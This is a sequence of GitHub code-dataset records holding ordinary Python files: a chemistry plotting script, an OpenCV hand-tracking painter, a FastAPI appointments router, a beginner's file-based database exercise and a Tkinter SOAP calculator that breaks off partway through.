ax2) = plt.subplots(sharex=True, nrows=3)\n def plot(ax, data, title):\n colors = matplotlib.cm.Greys(np.linspace(0, 1, num=data.shape[0]))\n for row, color in zip(data, colors):\n ax.plot(row, \"o-\", color=color)\n ax.set_yscale('log')\n if title:\n ax.set_title(title)\n plot(ax0, all_max_forces, \"max(perpendicular gradient)\")\n plot(ax1, all_rms_forces, \"rms(perpendicular gradient)\")\n plot(ax2, force_norms, \"norm(true gradient)\")\n ax2.set_xlabel(\"Images\")\n\n plt.tight_layout()\n plt.show()\n\n\ndef plot_multistate_pes(keys):\n (pes_ens, coords), num_cycles, num_images = load_results(keys)\n pes_ens -= pes_ens.min(axis=(2, 1), keepdims=True)\n pes_ens *= 27.211396\n\n plotter = Plotter(coords, pes_ens, \"ΔE / eV\")\n plotter.animate()\n\n\ndef plot_params(inds):\n def get_bond_length(coords_slice):\n return np.linalg.norm(coords_slice[0]-coords_slice[1]) * BOHR2ANG * 100\n\n def get_angle(coords_slice):\n vec1 = coords_slice[0] - coords_slice[1]\n vec2 = coords_slice[2] - coords_slice[1]\n vec1n = np.linalg.norm(vec1)\n vec2n = np.linalg.norm(vec2)\n dotp = np.dot(vec1, vec2)\n radians = np.arccos(dotp / (vec1n * vec2n))\n return radians * 180 / np.pi\n\n def get_dihedral(coords_slice):\n raise Exception(\"Not implemented yet!\")\n\n type_dict = {\n 2: (\"bond length / pm\", get_bond_length),\n 3: (\"angle / °\", get_angle),\n 4: (\"dihedral / °\", get_dihedral)\n }\n inds_list = [[int(i) for i in i_.split()] for i_ in inds.split(\",\")]\n ylabels, funcs = zip(*[type_dict[len(inds)] for inds in inds_list])\n assert all([len(inds_list[i]) == len(inds_list[i+1])\n for i in range(len(inds_list)-1)]), \"Can only display \" \\\n \"multiple coordinates of the same type (bond, angle or \" \\\n \"dihedral.\"\n # Just use the first label because they all have to be the same\n ylabel = ylabels[0]\n\n key = \"coords\"\n # only allow same type of coordinate if multiple coordinates are given?\n coords, num_cycles, num_images = load_results(key)\n\n # Coordinates for all images for all cycles\n ac = list()\n for i, per_cycle in enumerate(coords):\n # Coordinates for all images per cycle\n pc = list()\n for j, per_image in enumerate(per_cycle):\n # Coordinates per ind for all images\n pi = list()\n for inds, func in zip(inds_list, funcs):\n coords_slice = per_image.reshape(-1, 3)[inds]\n param = func(coords_slice)\n pi.append(param)\n pc.append(pi)\n ac.append(pc)\n\n ac_arr = np.array(ac)\n\n # Construct legend list\n legend = [\"-\".join([str(i) for i in inds]) for inds in inds_list]\n plotter = Plotter(coords, ac_arr, ylabel, legend=legend)\n plotter.animate()\n\n #df = pd.DataFrame(ac_arr)\n #cmap = plt.get_cmap(\"Greys\")\n #ax = df.plot(\n # title=f\"Params {inds}\",\n # colormap=cmap,\n # legend=False,\n # marker=\"o\",\n # xticks=range(num_images),\n # xlim=(0, num_images-1),\n #)\n #ax.set_xlabel(\"Image\")\n #ax.set_ylabel(ylabel)\n #plt.tight_layout()\n plt.show()\n\n\ndef plot_all_energies(h5):\n with h5py.File(h5) as handle:\n energies = handle[\"all_energies\"][:]\n roots = handle[\"roots\"][:]\n flips = handle[\"root_flips\"][:]\n print(f\"Found a total of {len(roots)} steps.\")\n print(f\"{flips} root flips occured.\")\n\n energies -= energies.min()\n energies *= AU2EV\n\n # Don't plot steps where flips occured\n # energies = np.concatenate((energies[0][None,:], energies[1:,:][~flips]), axis=0)\n energies_ = list()\n roots_ = list()\n steps = list()\n for i, root_flip in enumerate(flips[:-1]):\n if root_flip:\n print(f\"Root flip occured between {i} and {i+1}.\")\n continue\n print(f\"Using step {i}\")\n energies_.append(energies[i])\n roots_.append(roots[i])\n steps.append(i)\n # Don't append last step if a root flip occured there.\n if not flips[-1]:\n energies_.append(energies[-1])\n roots_.append(roots[-1])\n steps.append(i+1)\n else:\n print(\"Root flip occured in the last step. Not showing the last step.\")\n\n energies = np.array(energies_)\n roots = np.array(roots_)\n\n fig, ax = plt.subplots()\n for i, state in enumerate(energies.T):\n ax.plot(steps, state, \"o-\", label=f\"State {i:03d}\")\n ax.legend(loc=\"lower center\", ncol=3)\n ax.set_xlabel(\"Step\")\n ax.set_ylabel(\"$\\Delta E / eV$\")\n root_ens = [s[r] for s, r in zip(energies, roots)]\n ax.plot(steps, root_ens, \"--k\")\n plt.show()\n\n\ndef plot_bare_energies(h5):\n with h5py.File(h5) as handle:\n energies = handle[\"all_energies\"][:]\n print(f\"Found a total of {len(energies)} steps.\")\n\n energies -= energies.min()\n energies *= AU2EV\n steps = np.arange(len(energies))\n\n fig, ax = plt.subplots()\n for i, state in enumerate(energies.T):\n ax.plot(steps, state, \"o-\", label=f\"State {i:03d}\")\n ax.legend(loc=\"lower center\", ncol=3)\n ax.set_xlabel(\"Step\")\n ax.set_ylabel(\"$\\Delta E / eV$\")\n plt.show()\n\n\ndef plot_overlaps(h5, thresh=.1):\n with h5py.File(h5) as handle:\n overlaps = handle[\"overlap_matrices\"][:]\n ovlp_type = handle[\"ovlp_type\"][()].decode()\n ovlp_with = handle[\"ovlp_with\"][()].decode()\n roots = handle[\"roots\"][:]\n calculated_roots = handle[\"calculated_roots\"][:]\n ref_cycles = handle[\"ref_cycles\"][:]\n ref_roots = handle[\"ref_roots\"][:]\n try:\n cdd_img_fns = handle[\"cdd_imgs\"][:]\n except KeyError:\n print(f\"Couldn't find image data in '{h5}'.\")\n try:\n with open(CDD_PNG_FNS) as handle:\n cdd_img_fns = handle.read().split()\n print(f\"Found image data in '{CDD_PNG_FNS}'\")\n except FileNotFoundError:\n cdd_img_fns = None\n cdd_imgs = None\n if cdd_img_fns is not None:\n try:\n cdd_imgs = [mpimg.imread(fn) for fn in cdd_img_fns]\n except FileNotFoundError:\n png_paths = [Path(fn.decode()).name for fn in cdd_img_fns]\n cdd_imgs = [mpimg.imread(fn) for fn in png_paths]\n\n overlaps[np.abs(overlaps) < thresh] = np.nan\n print(f\"Found {len(overlaps)} overlap matrices.\")\n print(f\"Roots: {roots}\")\n print(f\"Reference cycles: {ref_cycles}\")\n print(f\"Reference roots: {ref_roots}\")\n\n print(\"Key-bindings:\")\n print(\"i: switch between current and first cycle.\")\n print(\"e: switch between current and last cycle.\")\n\n fig, ax = plt.subplots()\n\n n_states = overlaps[0].shape[0]\n\n def draw(i):\n fig.clf()\n if cdd_imgs is not None:\n ax = fig.add_subplot(121)\n ax1 = fig.add_subplot(122)\n else:\n ax = fig.add_subplot(111)\n ax1 = None\n o = np.abs(overlaps[i])\n im = ax.imshow(o, vmin=0, vmax=1)\n # fig.colorbar(im)\n ax.grid(color=\"#CCCCCC\", linestyle='--', linewidth=1)\n ax.set_xticks(np.arange(n_states, dtype=np.int))\n ax.set_yticks(np.arange(n_states, dtype=np.int))\n ax.set_xlabel(\"new states\")\n ax.set_ylabel(\"reference states\")\n for (l,k), value in np.ndenumerate(o):\n if np.isnan(value):\n continue\n value_str = f\"{abs(value):.2f}\"\n ax.text(k, l, value_str, ha='center', va='center')\n j, k = ref_cycles[i], i+1\n ref_root = ref_roots[i]\n ref_ind = ref_root - 1\n old_root = calculated_roots[i+1]\n new_root = roots[i+1]\n ref_overlaps = o[ref_ind]\n if ovlp_type == \"wf\":\n ref_ind += 1\n argmax = np.nanargmax(ref_overlaps)\n xy = (argmax-0.5, ref_ind-0.5)\n highlight = Rectangle(xy, 1, 1,\n fill=False, color=\"red\", lw=\"4\")\n ax.add_artist(highlight)\n if ax1:\n ax1.imshow(cdd_imgs[i])\n fig.suptitle(f\"overlap {i:03d}\\n\"\n f\"{ovlp_type} overlap between {j:03d} and {k:03d}\\n\"\n f\"old root: {old_root}, new root: {new_root}\")\n fig.canvas.draw()\n draw(0)\n\n i = 0\n i_backup = i\n i_last = len(overlaps)-1\n def press(event):\n nonlocal i\n nonlocal i_backup\n if event.key == \"left\":\n i = max(0, i-1)\n elif event.key == \"right\":\n i = min(i_last, i+1)\n # Switch between current and first cycle\n elif event.key == \"i\":\n if i == 0:\n # Restore previous cycle\n i = i_backup\n else:\n # Save current i and jump to the first cycle/image\n i_backup = i\n i = 0\n # Switch between current and last cycle\n elif event.key == \"e\":\n if i == i_last:\n # Restore previous cycle\n i = i_backup\n else:\n # Save current i and jump to the first cycle/image\n i_backup = i\n i = i_last\n else:\n return\n draw(i)\n fig.canvas.mpl_connect(\"key_press_event\", press)\n plt.show()\n\n\ndef render_cdds(h5):\n with h5py.File(h5) as handle:\n cdd_cubes = handle[\"cdd_cubes\"][:].astype(str)\n orient = handle[\"orient\"][()].decode()\n cdd_cubes = [Path(cub) for cub in cdd_cubes]\n print(f\"Found {len(cdd_cubes)} CDD cube filenames in {h5}\")\n # Check if cubes exist\n non_existant_cubes = [cub for cub in cdd_cubes if not cub.exists()]\n existing_cubes = [str(cub) for cub in set(cdd_cubes) - set(non_existant_cubes)]\n if any(non_existant_cubes):\n print(\"Couldn't find cubes:\")\n print(\"\\n\".join([\"\\t\" + str(cub) for cub in non_existant_cubes]))\n print(\"Dropping full path and looking only for cube names.\")\n cub_names = [cub.name for cub in non_existant_cubes]\n _ = [cub for cub in cub_names if Path(cub).exists()]\n existing_cubes = existing_cubes + _\n cdd_cubes = existing_cubes\n\n # Create list of all final PNG filenames\n png_fns = [Path(cube).with_suffix(\".png\") for cube in cdd_cubes]\n # Check which cubes are already rendered\n png_stems = [png.stem for png in png_fns\n if png.exists()]\n print(f\"{len(png_stems)} cubes seem already rendered.\")\n\n # Only render cubes that are not yet rendered\n cdd_cubes = [cube for cube in cdd_cubes\n if Path(cube).stem not in png_stems]\n print(f\"Rendering {len(cdd_cubes)} CDD cubes.\")\n\n for i, cube in enumerate(cdd_cubes):\n print(f\"Rendering cube {i+1:03d}/{len(cdd_cubes):03d}\")\n _ = render_cdd_cube(cube, orient=orient)\n joined = \"\\n\".join([str(fn) for fn in png_fns])\n with open(CDD_PNG_FNS, \"w\") as handle:\n handle.write(joined)\n print(\"Rendered PNGs:\")\n print(joined)\n print(f\"Wrote list of rendered PNGs to '{CDD_PNG_FNS}'\")\n\n\ndef plot_afir():\n with open(\"image_results.yaml\") as handle:\n res = yaml.load(handle.read(), Loader=yaml.loader.Loader)\n\n afir_ens = [_[\"energy\"] for _ in res]\n true_ens = [_[\"true_energy\"] for _ in res]\n afir_ens = np.array(afir_ens) * AU2KJPERMOL\n afir_ens -= afir_ens.min()\n true_ens = np.array(true_ens) * AU2KJPERMOL\n true_ens -= true_ens.min()\n\n afir_forces = np.linalg.norm([_[\"forces\"] for _ in res], axis=1)\n true_forces = np.linalg.norm([_[\"true_forces\"] for _ in res], axis=1)\n afir_forces = np.array(afir_forces)\n true_forces = np.array(true_forces)\n\n\n fig, (en_ax, forces_ax) = plt.subplots(nrows=2, sharex=True)\n\n style1 = \"r--\"\n style2 = \"g--\"\n style3 = \"bo-\"\n\n l1 = en_ax.plot(afir_ens, style1, label=\"AFIR\")\n l2 = en_ax.plot(true_ens, style2, label=\"True\")\n en_ax2 = en_ax.twinx()\n l3 = en_ax2.plot(true_ens+afir_ens, style3, label=\"Sum\")\n en_ax2.tick_params(axis=\"y\", labelcolor=\"blue\")\n\n lines = l1 + l2 + l3\n labels = [l.get_label() for l in lines]\n en_ax.legend(lines, labels, loc=0)\n\n en_ax.set_title(\"Energies\")\n en_ax.set_ylabel(\"$\\Delta$E kJ / mol\")\n\n forces_ax.set_title(\"||Forces||\")\n l1 = forces_ax.plot(afir_forces, style1, label=\"AFIR\")\n l2 = forces_ax.plot(true_forces, style2, label=\"True\")\n\n forces_ax2 = forces_ax.twinx()\n l3 = forces_ax2.plot(true_forces + afir_forces, style3, label=\"Sum\")\n forces_ax2.tick_params(axis=\"y\", labelcolor=\"blue\")\n\n lines = l1 + l2 + l3\n labels = [l.get_label() for l in lines]\n forces_ax.legend(lines, labels, loc=0)\n\n peak_inds, _ = peakdetect(true_ens, lookahead=2)\n print(f\"Peaks: {peak_inds}\")\n try:\n peak_xs, peak_ys = zip(*peak_inds)\n highest = np.argmax(peak_ys)\n\n en_ax.scatter(peak_xs, peak_ys, s=100, marker=\"X\", c=\"k\", zorder=10)\n en_ax.scatter(peak_xs[highest], peak_ys[highest],\n s=150, marker=\"X\", c=\"k\", zorder=10)\n en_ax.axvline(peak_xs[highest], c=\"k\", ls=\"--\")\n forces_ax.axvline(peak_xs[highest], c=\"k\", ls=\"--\")\n except ValueError as err:\n print(\"Peak-detection failed!\")\n\n # fig.legend(loc=\"upper right\")\n plt.tight_layout()\n plt.show()\n\n\ndef parse_args(args):\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--first\", type=int,\n help=\"Only consider the first [first] cycles.\")\n parser.add_argument(\"--last\", type=int,\n help=\"Only consider the last [last] cycles.\")\n parser.add_argument(\"--h5\", default=\"overlap_data.h5\")\n parser.add_argument(\"--orient\", default=\"\")\n\n group = parser.add_mutually_exclusive_group(required=True)\n group.add_argument(\"--saras\", action=\"store_true\",\n help=\"Plot OpenMolcas state average potential energy \"\n \"surfaces over the course of the NEB.\")\n group.add_argument(\"--tddft\", action=\"store_true\",\n help=\"Plot ORCA TDDFT potential energy surfaces \"\n \"over the course of the NEB.\")\n group.add_argument(\"--params\",\n help=\"Follow internal coordinates over the course of \"\n \"the NEB. All atom indices have to be 0-based. \"\n \"Use two indices for a bond, three indices for \"\n \"an angle and four indices for a dihedral. \"\n \"The indices for different coordinates have to \"\n \"be separated by ','.\")\n group.add_argument(\"--cosgrad\", \"--cg\", action=\"store_true\",\n help=\"Plot image gradients along the path.\")\n group.add_argument(\"--energies\", \"-e\", action=\"store_true\",\n help=\"Plot energies.\")\n group.add_argument(\"--aneb\", action=\"store_true\",\n help=\"Plot Adaptive NEB.\")\n group.add_argument(\"--all_energies\", \"-a\", action=\"store_true\",\n help=\"Plot ground and excited state energies from 'overlap_data.h5'.\"\n )\n group.add_argument(\"--bare_energies\", \"-b\", action=\"store_true\",\n help=\"Plot ground and excited state energies from 'overlap_data.h5'.\"\n )\n group.add_argument(\"--afir\", action=\"store_true\",\n help=\"Plot AFIR and true -energies and -forces from an AFIR calculation.\"\n )\n group.add_argument(\"--opt\", action=\"store_true\",\n help=\"Plot optimization progress.\"\n )\n group.add_argument(\"--irc\", action=\"store_true\",\n help=\"Plot IRC progress.\"\n )\n group.add_argument(\"--overlaps\", \"-o\", action=\"store_true\")\n group.add_argument(\"--render_cdds\", action=\"store_true\")\n\n return parser.parse_args(args)\n\n\ndef plot_opt(h5_fn=\"optimization.h5\", group_name=\"opt\"):\n with h5py.File(\"optimization.h5\", \"r\") as handle:\n group = handle[group_name]\n cur_cycle = group[\"cur_cycle\"][()]\n ens = group[\"energies\"][:cur_cycle]\n is_cos = group[\"is_cos\"][()]\n max_forces = group[\"max_forces\"][:cur_cycle]\n rms_forces = group[\"rms_forces\"][:cur_cycle]\n\n ens -= ens.min()\n ens *= AU2KJPERMOL\n if is_cos:\n print(\"COS optimization detected. Plotting total energy of all images \"\n \"in every cycle. Results from optimizing growing COS methods can \"\n \"be plotted but the plots are not really useful as the varying \"\n \"number of images is not considered.\")\n ens = ens.sum(axis=1)\n\n ax_kwargs = {\n \"marker\": \"o\",\n }\n\n fig, (ax0, ax1, ax2) = plt.subplots(nrows=3, sharex=True)\n\n ax0.plot(ens, **ax_kwargs)\n ax0.set_ylabel(\"$\\Delta E$ / kJ mol⁻¹\")\n\n ax1.plot(max_forces, **ax_kwargs)\n ax1.set_title(\"max(forces)\")\n ax1.set_ylabel(\"$E_h$ Bohr⁻¹ (rad)⁻¹\")\n\n ax2.plot(rms_forces, **ax_kwargs)\n ax2.set_title(\"rms(forces)\")\n ax2.set_xlabel(\"Step\")\n ax2.set_ylabel(\"$E_h$ Bohr⁻¹ (rad)⁻¹\")\n\n fig.suptitle(str(h5_fn) + \"/\" + group_name)\n plt.show()\n\n\ndef plot_irc():\n cwd = Path(\".\")\n h5s = cwd.glob(\"*irc_data.h5\")\n for h5 in h5s:\n type_ = h5.name.split(\"_\")[0]\n title = f\"{type_.capitalize()} IRC data\"\n _ = plot_irc_h5(h5, title)\n plt.show()\n\n\ndef plot_irc_h5(h5, title=None):\n print(f\"Reading IRC data {h5}\")\n with h5py.File(h5, \"r\") as handle:\n mw_coords = handle[\"mw_coords\"][:]\n energies = handle[\"energies\"][:]\n gradients = handle[\"gradients\"][:]\n rms_grad_thresh = handle[\"rms_grad_thresh\"][()]\n try:\n ts_index = handle[\"ts_index\"][()]\n except KeyError:\n ts_index = None\n\n energies -= energies[0]\n energies *= AU2KJPERMOL\n\n cds = np.linalg.norm(mw_coords - mw_coords[0], axis=1)\n rms_grads = np.sqrt(np.mean(gradients**2, axis=1))\n max_grads = np.abs(gradients).max(axis=1)\n\n fig, (ax0, ax1, ax2) = plt.subplots(nrows=3, sharex=True)\n\n plt_kwargs = {\n \"linestyle\": \"-\",\n \"marker\": \"o\",\n }\n\n ax0.plot(cds, energies, **plt_kwargs)\n ax0.set_title(\"energy change\")\n ax0.set_ylabel(\"kJ mol⁻¹\")\n\n ax1.plot(cds, rms_grads, **plt_kwargs)\n ax1.axhline(rms_grad_thresh, linestyle=\"--\", color=\"k\")\n ax1.set_title(\"rms(gradient)\")\n ax1.set_ylabel(\"Hartree / bohr\")\n\n ax2.plot(cds, max_grads, **plt_kwargs)\n ax2.set_title(\"max(gradient)\")\n ax2.set_xlabel(\"IRC / amu$^{\\\\frac{1}{2}}$ bohr\")\n ax2.set_ylabel(\"Hartree / bohr\")\n\n if ts_index:\n x = cds[ts_index]\n for ax, arr in ((ax0, energies), (ax1, rms_grads), (ax2, max_grads)):\n xy = (x, arr[ts_index])\n ax.annotate(\"TS\", xy, fontsize=12, fontweight=\"bold\")\n\n if title:\n fig.suptitle(title)\n else:\n fig.tight_layout()\n\n return fig, (ax0, ax1, ax2)\n\n\ndef run():\n args = parse_args(sys.argv[1:])\n\n h5 = args.h5\n\n if args.energies:\n plot_energies()\n elif args.saras:\n keys = (\"sa_energies\", \"coords\")\n plot_multistate_pes(keys)\n elif args.tddft:\n keys = (\"tddft_energies\", \"coords\")\n plot_multistate_pes(keys)\n elif args.params:\n plot_params(args.params)\n elif args.cosgrad:\n plot_cosgrad()\n elif args.aneb:\n plot_aneb()\n elif args.all_energies:\n plot_all_energies(h5=h5)\n elif args.overlaps:\n plot_overlaps(h5=h5)\n elif args.render_cdds:\n render_cdds(h5=h5)\n elif args.bare_energies:\n plot_bare_energies(h5=h5)\n elif args.afir:\n plot_afir()\n elif args.opt:\n plot_opt()\n elif args.irc:\n plot_irc()\n\n\nif __name__ == \"__main__\":\n run()\n","repo_name":"eljost/pysisyphus","sub_path":"deprecated/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":30386,"program_lang":"python","lang":"en","doc_type":"code","stars":71,"dataset":"github-code","pt":"43"} +{"seq_id":"39154029717","text":"import cv2\r\nimport numpy as np\r\nimport time\r\nimport os\r\nimport HandTrackingModule as htm\r\n\r\nfolderPath = \"Header\"\r\nmyList = os.listdir(folderPath)\r\n# print(myList)\r\noverlayList = []\r\nfor imPath in myList:\r\n image = cv2.imread(f'{folderPath}/{imPath}')\r\n overlayList.append(image)\r\n# print(len(overlayList))\r\n\r\ndetector = htm.handDetector(detectionCon=0.75, maxHands=1)\r\nimgCanvas = np.zeros((720, 1280, 3), np.uint8)\r\n\r\nclass VideoCamera2(object):\r\n def __init__(self):\r\n # capturing video\r\n self.wCam, self.hCam = 640, 480\r\n self.cap = cv2.VideoCapture(1)\r\n self.cap.set(3, self.wCam)\r\n self.cap.set(4, self.hCam)\r\n self.pTime = 0\r\n self.header = overlayList[0]\r\n self.drawColor = (255, 0, 255)\r\n self.xp, self.yp = 0, 0\r\n self.brushThickness = 15\r\n self.eraserThickness = 100\r\n\r\n def __del__(self):\r\n pass\r\n # releasing camera\r\n self.cap.release()\r\n\r\n def get_frame(self):\r\n # extracting frames\r\n\r\n # 1. Import image\r\n success, img = self.cap.read()\r\n img = cv2.flip(img, 1)\r\n img = cv2.resize(img, (1280, 720))\r\n # print(\"1\", img.shape)\r\n # print(\"2\", imgCanvas.shape)\r\n\r\n # 2. Find Hand Landmarks\r\n img = detector.findHands(img)\r\n lmList, bbox = detector.findPosition(img, draw=False)\r\n\r\n if len(lmList) == 0:\r\n self.xp, self.yp = 0, 0\r\n\r\n if len(lmList) != 0:\r\n # print(lmList)\r\n\r\n # tip of index and middle fingers\r\n x1, y1 = lmList[8][1:]\r\n x2, y2 = lmList[12][1:]\r\n\r\n # 3. Check which fingers are up\r\n fingers = detector.fingersUp()\r\n # print(fingers)\r\n\r\n # 4. If Selection Mode - Two finger are up\r\n if fingers[1] and fingers[2]:\r\n self.xp, self.yp = 0, 0\r\n # print(\"Selection Mode\")\r\n # # Checking for the click\r\n if y1 < 125:\r\n if 250 < x1 < 450:\r\n self.header = overlayList[0]\r\n self.drawColor = (255, 0, 255)\r\n elif 550 < x1 < 750:\r\n self.header = overlayList[1]\r\n self.drawColor = (255, 0, 0)\r\n elif 800 < x1 < 950:\r\n self.header = overlayList[2]\r\n self.drawColor = (0, 255, 0)\r\n elif 1050 < x1 < 1200:\r\n self.header = overlayList[3]\r\n self.drawColor = (0, 0, 0)\r\n cv2.rectangle(img, (x1, y1 - 25), (x2, y2 + 25), self.drawColor, cv2.FILLED)\r\n\r\n # 5. If Drawing Mode - Index finger is up\r\n if fingers[1] and fingers[2] == False:\r\n cv2.circle(img, (x1, y1), 15, self.drawColor, cv2.FILLED)\r\n # print(\"Drawing Mode\")\r\n if self.xp == 0 and self.yp == 0:\r\n self.xp, self.yp = x1, y1\r\n\r\n if self.drawColor == (0, 0, 0):\r\n cv2.line(img, (self.xp, self.yp), (x1, y1), self.drawColor, self.eraserThickness)\r\n cv2.line(imgCanvas, (self.xp, self.yp), (x1, y1), self.drawColor, self.eraserThickness)\r\n else:\r\n cv2.line(img, (self.xp, self.yp), (x1, y1), self.drawColor, self.brushThickness)\r\n cv2.line(imgCanvas, (self.xp, self.yp), (x1, y1), self.drawColor, self.brushThickness)\r\n\r\n self.xp, self.yp = x1, y1\r\n\r\n imgGray = cv2.cvtColor(imgCanvas, cv2.COLOR_BGR2GRAY)\r\n _, imgThres = cv2.threshold(imgGray, 10, 255, cv2.THRESH_BINARY_INV)\r\n imgInv = cv2.cvtColor(imgThres, cv2.COLOR_GRAY2BGR)\r\n img = cv2.bitwise_and(img, imgInv)\r\n img = cv2.bitwise_or(img, imgCanvas)\r\n\r\n # Setting the header image\r\n img[0:125, 0:1280] = self.header\r\n # img = cv2.addWeighted(img, 0.5, imgCanvas, 0.5, 0)\r\n # cv2.imshow(\"Image\", img)\r\n # cv2.imshow(\"Canvas\", imgCanvas)\r\n # cv2.imshow(\"Gray\", imgGray)\r\n # cv2.imshow(\"Thres\", imgThres)\r\n # cv2.imshow(\"Inv\", imgInv)\r\n # cv2.waitKey(1)\r\n\r\n ret, jpeg = cv2.imencode('.jpg', img)\r\n return jpeg.tobytes()","repo_name":"desairaj414/Computer-Controlling-Using-OpenCV","sub_path":"camera2.py","file_name":"camera2.py","file_ext":"py","file_size_in_byte":4299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"14304164833","text":"from fastapi import APIRouter, Depends\nfrom typing import Union, List, Dict\nfrom authenticator import authenticator\nfrom queries.appointments import (\n AppointmentIn,\n AppointmentRepository,\n AppointmentOut,\n Error,\n)\nfrom queries.jotters import JottersRepository\n\n\nrouter = APIRouter()\n\n\n@router.post(\"/appointments\", response_model=Union[AppointmentOut, Error])\ndef create_appointment(\n appointment: AppointmentIn,\n repo: AppointmentRepository = Depends(),\n user_data: Dict = Depends(authenticator.get_current_account_data),\n jotter_repo: JottersRepository = Depends(),\n):\n appointment.user_id = user_data[\"id\"]\n current_balance = jotter_repo.get_one(user_data[\"id\"]).balance\n if current_balance < 10:\n return Error(\n message=\"Your balance is insufficient to make an appointment\"\n )\n result = repo.create(appointment)\n jotter_repo.change_balance(user_data[\"id\"], -10)\n return result\n\n\n@router.get(\"/appointments\", response_model=Union[List[AppointmentOut], Error])\ndef get_all_appointments_for_user(\n repo: AppointmentRepository = Depends(),\n user_data: Dict = Depends(authenticator.get_current_account_data),\n):\n user_id = user_data[\"id\"]\n return repo.get_all_appointments_for_user(user_id)\n\n\n@router.get(\"/therapistappointments\",\n response_model=Union[List[AppointmentOut], Error])\ndef get_all_appointments_for_therapist(\n repo: AppointmentRepository = Depends(),\n user_data: Dict = Depends(authenticator.get_current_account_data),\n):\n therapist_id = user_data[\"id\"]\n return repo.get_all_appointments_for_therapist(therapist_id)\n\n\n@router.delete(\n \"/appointments/{appointment_id}\",\n response_model=bool,\n)\ndef delete_appointment(\n appointment_id: int,\n repo: AppointmentRepository = Depends(),\n user_data: Dict = Depends(authenticator.get_current_account_data),\n) -> bool:\n return repo.delete_appointment(appointment_id)\n\n\n@router.get(\n \"/appointments/{appointment_id}\",\n response_model=Union[Error, AppointmentOut],\n)\ndef get_one_appointment(\n appointment_id: int,\n repo: AppointmentRepository = Depends(),\n user_data: Dict = Depends(authenticator.get_current_account_data),\n) -> Union[AppointmentOut, Error]:\n return repo.get_one_appointment(appointment_id)\n\n\n@router.put(\n \"/appointments/{appointment_id}\",\n response_model=Union[AppointmentOut, Error],\n)\ndef update_appointment(\n appointment_id: int,\n appointment: AppointmentIn,\n repo: AppointmentRepository = Depends(),\n user_data: Dict = Depends(authenticator.get_current_account_data),\n) -> Union[Error, AppointmentOut]:\n return repo.update_appointment(appointment_id, appointment)\n","repo_name":"drceran/feel-better","sub_path":"therapy/routers/appointments.py","file_name":"appointments.py","file_ext":"py","file_size_in_byte":2702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"37031060200","text":"#In data base we are able to perform CRUD operations which are:\n#Create record\n#Read record\n#Update record\n#Delete record\n\n#In the databse operation ,add find user to enable search for user\nimport os #os allows us to delete a file in the os\n\nuser_db_path='data/user_record/'\n\n\ndef create(accountNumber,userDetails):\n\n completion_state=False\n\n try:\n f=open(user_db_path + str(accountNumber)+ '.txt','x')\n \n except FileExistsError:\n print('User already exist')\n #delete the already created file, and print out error, then return false\n #check content of file before deleting\n\n # delete(accountNumber)\n\n else: \n f.write(str(userDetails))\n completion_state=True\n\n finally:\n f.close()\n return completion_state\n\n\n return completion_state\n\n # create a file\n #name of the file would be account.txt\n #add the user details to the file\n #return true \n #if saving to file fails, then delete created file\n\ndef read(user_account_number):\n print('Read user account number')\n #find user with account number\n #fetch content of the file \n\ndef update(user_account_number):\n print('update user record')\n #find user with account number \n #fetch the content of the file\n #update the content of the file\n #save the file \n #return true\n\n\ndef delete(user_account_number):\n \n is_delete_successful=False\n\n if os.path.exists(user_db_path + str(user_account_number)+'.txt'):\n\n try:\n\n os.remove(user_db_path+ str(user_account_number)+'.txt')\n is_delete_successful=True\n\n except FileNotFoundError:\n print('User not found')\n\n finally:\n \n return is_delete_successful\n\n #find user with account number \n #delete the user recod (file)\n #return true \n\ndef find(user_account_number):\n print('find user')\n # find user record in the data folder \n\nprint(delete(3652386601))\n\n","repo_name":"rossi2018/Zuri-Training-2021","sub_path":"Python_clases/31File_system_database_project2_Delete_user/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":1968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"27465775309","text":"from tkinter import *\nfrom zeep import Client\n\n\n # TODO : Fix equal Button\n # TODO : Fix button_add methode \n # TODO : Improve UI\n \n \n# ! Using Zeep Module to connect to our wsdl file in localhost\nclient = Client(wsdl='http://localhost:8000/calculator/?wsdl')\n\n\n# *This methode will be used to clear the Entry data and initializing the global variables to None\ndef clear_button():\n first_int = None\n second_int = None\n global_operation == None \n e.delete(0,\"end\")\n\n\ndef button_add(number):\n e.insert(\"end\",number)\n\n\n\n# * this methode will store the first number and delete content of entery so we make space for the second number\ndef button_operation(operation):\n input1 = e.get()\n num = input1\n if num != \"\" :\n global global_operation \n global first_int\n \n first_int = int(num)\n global_operation = operation\n e.delete(0,'end')\n else:\n pass\n\n# * Defining the equal methode : \n# * this methode will use the wsdl file from localhost to make the operation choosed\n# ! Check out this repo to acces SOAP Service : https://github.com/qbdq/Calculator_soap_service_django\n\ndef equal_operation():\n input2 = e.get()\n num2 = input2\n \n if num2 != \"\":\n global second_int\n second_int = int(num2)\n if global_operation==\"+\":\n result = client.service.sum(first_int,second_int)\n elif global_operation==\"-\":\n result = client.service.minus(first_int,second_int)\n elif global_operation == \"*\":\n result = client.service.prod(first_int,second_int)\n elif global_operation ==\"/\":\n result = client.service.div(first_int,second_int)\n \n equal = True\n e.delete(0, 'end')\n e.insert(0,result)\n else:\n e.delete(0,\"end\")\n e.insert(0,first_int)\n \n \n\n\n\n# * Creating our root frame and titling it \nroot = Tk()\nroot.title(\"Calculator using SOAP Services\")\n\ne = Entry(root,width=40, borderwidth=5)\ne.grid(row=0 , column = 0, columnspan=4, padx=5, pady=5)\n\n# Defining buttons\nbutton_1 = Button(root , text = \"1\" ,padx =40 , pady= 20 , command =lambda :button_add(1))\nbutton_2 = Button(root , text = \"2\" ,padx =40 , pady= 20 , command =lambda :button_add(2))\nbutton_3 = Button(root , text = \"3\" ,padx =40 , pady= 20 , command =lambda :button_add(3))\nbutton_4 = Button(root , text = \"4\" ,padx =40 , pady= 20 , command =lambda :button_add(4))\nbutton_5 = Button(root , text = \"5\" ,padx =40 , pady= 20 , command =lambda :button_add(5))\nbutton_6 = Button(root , text = \"6\" ,padx =40 , pady= 20 , command =lambda :button_add(6))\nbutton_7 = Button(root , text = \"7\" ,padx =40 , pady= 20 , command =lambda :button_add(7))\nbutton_8 = Button(root , text = \"8\" ,padx =40 